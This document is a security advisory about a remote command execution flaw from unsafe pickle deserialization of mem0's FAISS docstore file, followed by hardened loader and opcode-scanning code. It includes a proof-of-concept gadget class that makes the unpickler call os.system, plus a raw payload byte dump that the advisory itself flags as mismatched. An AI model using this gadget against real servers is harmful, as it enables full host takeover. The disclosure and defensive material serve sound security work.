Description
Summary
Unsafe deserialization via pickle.load() in mem0's FAISS vector store lets anyone who can write the docstore pickle file execute arbitrary commands on the server host (Remote Command Execution).
Details
The vulnerability is the call to pickle.load() on the FAISS docstore file (faiss.py#L94). pickle is not a data-only format: while reconstructing objects it resolves module-level names and calls them, so a crafted file can make the loader invoke any importable callable, such as os.system, with attacker-chosen arguments.
```python
import pickle
# ... (faiss import, logger and the enclosing vector-store class are elided in this excerpt)

def _load(self, index_path: str, docstore_path: str):
    """
    Load FAISS index and docstore from disk.
    Args:
        index_path (str): Path to FAISS index file.
        docstore_path (str): Path to docstore pickle file.
    """
    try:
        self.index = faiss.read_index(index_path)
        with open(docstore_path, "rb") as f:
            # sink: pickle.load() executes whatever callables the file names while unpickling
            self.docstore, self.index_to_id = pickle.load(f)
        logger.info(f"Loaded FAISS index from {index_path} with {self.index.ntotal} vectors")
    except Exception as e:
        # reached only after the payload has already run; the failure is merely logged
        logger.warning(f"Failed to load FAISS index: {e}")
        self.docstore = {}
        self.index_to_id = {}
```
PoC
For a simple proof of concept we use the pickled bytes of the object below:
```python
import os

class Evil:
    # pickle calls __reduce__ to learn how to rebuild the object; returning
    # (callable, args) makes the unpickler call os.system("touch pwned") on load
    def __reduce__(self):
        return (os.system, ("touch pwned",))
```
that is, with pickle protocol 4: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94.
Note that os.system is recorded as posix.system, the module the function actually comes from on Unix. The dump is shown for illustration only: its string-length prefix (\x10) and FRAME length (0x2b) correspond to a 16-byte command rather than the 11-byte "touch pwned", so generate the payload with pickle.dumps(Evil()) instead of copying these bytes.
Written into the docstore file that _load() reads, this payload runs the command as soon as pickle.load() is reached. The surrounding try/except does not help: os.system has already returned by the time its integer result fails to unpack into (docstore, index_to_id), and that TypeError is swallowed and logged as a warning, so the store silently comes up empty while the attacker's command has executed.
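The following example was added for this page and is not code from mem0 or the advisory author. It rebuilds the gadget from the PoC against an in-memory copy of the docstore, shows the vulnerable pickle.load() path beside a hardened loader, and adds the two checks a practitioner would want: a static scan of the opcode stream with pickletools (nothing is executed) and an Unpickler whose find_class refuses every global, so os.system can never be resolved. The sample docstore contents are constructed, a harmless echo stands in for "touch pwned", and the (docstore, index_to_id) pair is assumed from what _load() unpacks rather than taken from mem0's real file layout.

```python
import io
import os
import pickle
import pickletools


class Evil:
    """Gadget of the same shape as the PoC: __reduce__ returns (callable, args),
    so the unpickler calls os.system(command) while "reconstructing" the object."""

    def __init__(self, command: str):
        self.command = command

    def __reduce__(self):
        return (os.system, (self.command,))


# Constructed sample inputs, not files taken from a mem0 deployment.
# A benign docstore with the shape _load() unpacks: (docstore, index_to_id).
BENIGN_DOCSTORE = pickle.dumps(
    ({"m1": {"text": "hello", "metadata": {}}}, {0: "m1"}),
    protocol=4,
)
# The attacker's file; a harmless echo stands in for "touch pwned".
MALICIOUS_DOCSTORE = pickle.dumps(Evil("echo pickle-rce-executed"), protocol=4)

# Opcodes that only appear when a pickle resolves a global or calls a
# callable. A docstore made of dicts, lists, tuples, strings and numbers
# is serialised with container/scalar opcodes and never needs these.
CODE_EXEC_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD",
    "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def suspicious_opcodes(data: bytes) -> list:
    """Static triage without executing anything: walk the opcode stream with
    pickletools and report the code-execution opcodes in order of appearance."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in CODE_EXEC_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Both GLOBAL and STACK_GLOBAL go through find_class; refusing every
    lookup means os.system (or any other callable) can never be resolved."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name} from an untrusted docstore")


def unsafe_load_docstore(data: bytes):
    """The pattern from faiss.py: plain pickle.load on attacker-controlled
    bytes. With the gadget above the command has already run by the time
    this returns, and the return value is os.system's exit status (an int),
    not the (docstore, index_to_id) tuple the caller expects."""
    return pickle.load(io.BytesIO(data))


def safe_load_docstore(data: bytes):
    """Hardened replacement for the pickle.load(f) call in _load():
    1. reject the file if it contains any code-execution opcode,
    2. unpickle with a find_class that refuses all globals,
    3. validate the shape before trusting the result."""
    found = suspicious_opcodes(data)
    if found:
        raise pickle.UnpicklingError(f"docstore uses {found}; refusing to load")
    loaded = RestrictedUnpickler(io.BytesIO(data)).load()
    if not (isinstance(loaded, tuple) and len(loaded) == 2
            and all(isinstance(part, dict) for part in loaded)):
        raise pickle.UnpicklingError("docstore does not have the (dict, dict) shape")
    return loaded


def is_rejected(data: bytes) -> bool:
    """True if safe_load_docstore refuses the bytes."""
    try:
        safe_load_docstore(data)
    except pickle.UnpicklingError:
        return True
    return False


def restricted_unpickler_alone_rejects(data: bytes) -> bool:
    """Exercise the restricted Unpickler on its own, so the gadget is blocked
    even if the opcode scan were skipped."""
    try:
        RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("malicious opcodes:", suspicious_opcodes(MALICIOUS_DOCSTORE))
    print("safe loader rejects payload:", is_rejected(MALICIOUS_DOCSTORE))
    print("safe loader returns:", safe_load_docstore(BENIGN_DOCSTORE))
    # Last, because this call actually runs the embedded command.
    print("unsafe loader returned:", unsafe_load_docstore(MALICIOUS_DOCSTORE))
```

The opcode scan is deliberately strict and will also reject a legitimate docstore that pickles custom classes; if the real file needs them, keep the scan out and instead narrow find_class to an explicit allowlist of those exact module/name pairs rather than allowing arbitrary lookups. Neither check is a substitute for treating the docstore file as trusted-only input: if it has to be stored somewhere an attacker can write, switching to a data-only format such as JSON removes the problem outright.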
Impact
Usually, an attacker who controls a FAISS index file can only poison or manipulate search results, for example by injecting vectors that distort nearest-neighbor retrieval.
Here the docstore file is loaded with pickle, so the same level of access yields arbitrary command execution on the host with the privileges of the mem0 process and no further restriction (e.g. spawning a reverse shell to gain interactive access to the server).
The impact is high: the attacker can completely take over the server host.
Credits
Edoardo Ottavianelli (@edoardottt)